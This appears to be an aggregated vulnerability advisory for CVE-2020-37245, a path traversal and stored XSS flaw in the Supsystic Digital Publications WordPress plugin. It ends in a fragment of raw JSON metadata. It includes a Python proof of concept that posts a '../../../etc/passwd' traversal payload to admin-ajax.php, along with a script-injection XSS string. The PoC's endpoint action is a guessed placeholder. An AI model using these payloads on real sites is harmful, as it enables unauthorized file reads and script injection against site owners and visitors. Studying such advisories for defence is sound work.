Security Vulnerability Report
CVE-2020-37245 CVSS 7.5 HIGH

Published: 2026-05-16 16:16:21
Last Modified: 2026-05-18 17:32:05

Description

Supsystic Digital Publications 1.6.9 contains a path traversal vulnerability in the Folder input field that allows attackers to access files outside the web root by injecting directory traversal sequences. Additionally, the plugin fails to sanitize input fields in publication settings, allowing stored cross-site scripting attacks through script injection in parameters like Area Width and Publication Width that execute when publications are viewed or edited.

CVSS Details

CVSS 3.1 Score (primary): 7.5
Severity: HIGH
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVSS 4.0 Score (secondary): 8.7 HIGH
Weakness: CWE-79 (Improper Neutralization of Input During Web Page Generation, i.e. cross-site scripting)

Configurations (Affected Products)

No configuration data available.

Supsystic Digital Publications <= 1.6.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# PoC for CVE-2020-37245: Path Traversal & Stored XSS
# Target: Supsystic Digital Publications <= 1.6.9


# 1. Path Traversal PoC
def check_path_traversal(target_url):
    # Vulnerable endpoint example (admin-ajax.php is common in WP)
    endpoint = target_url + "/wp-admin/admin-ajax.php"
    # Payload to read /etc/passwd
    payload = {
        "action": "some_folder_action",  # Replace with actual action name if known
        "folder": "../../../etc/passwd",
        "id": "1",
    }
    try:
        # timeout added so the check cannot hang on an unresponsive host
        response = requests.post(endpoint, data=payload, timeout=10)
        if "root:" in response.text:
            print("[+] Path Traversal Vulnerability Confirmed!")
            print(response.text[:200])
        else:
            print("[-] Path Traversal not detected.")
    except Exception as e:
        print(f"Error: {e}")


# 2. Stored XSS PoC Payload
# Inject this into 'Area Width' or 'Publication Width' parameter
xss_payload = '"><script>alert("CVE-2020-37245_XSS")</script>'
print(f"XSS Payload to inject in settings: {xss_payload}")

# Usage
# check_path_traversal("http://target-site.com")

References

https://downloads.wordpress.org/plugin/digital-publications-by-supsystic.1.6.9.zip
https://supsystic.com/
https://www.exploit-db.com/exploits/49542
https://www.vulncheck.com/advisories/wordpress-plugin-supsystic-digital-publications-path-traversal-xss

"NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://downloads.wordpress.org/plugin/digital-publications-by-supsystic.1.6.9.zip", "source": "[email protected]"}, {"url": "https://supsystic.com/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49542", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/wordpress-plugin-supsystic-digital-publications-path-traversal-xss", "source": "[email protected]"}]}}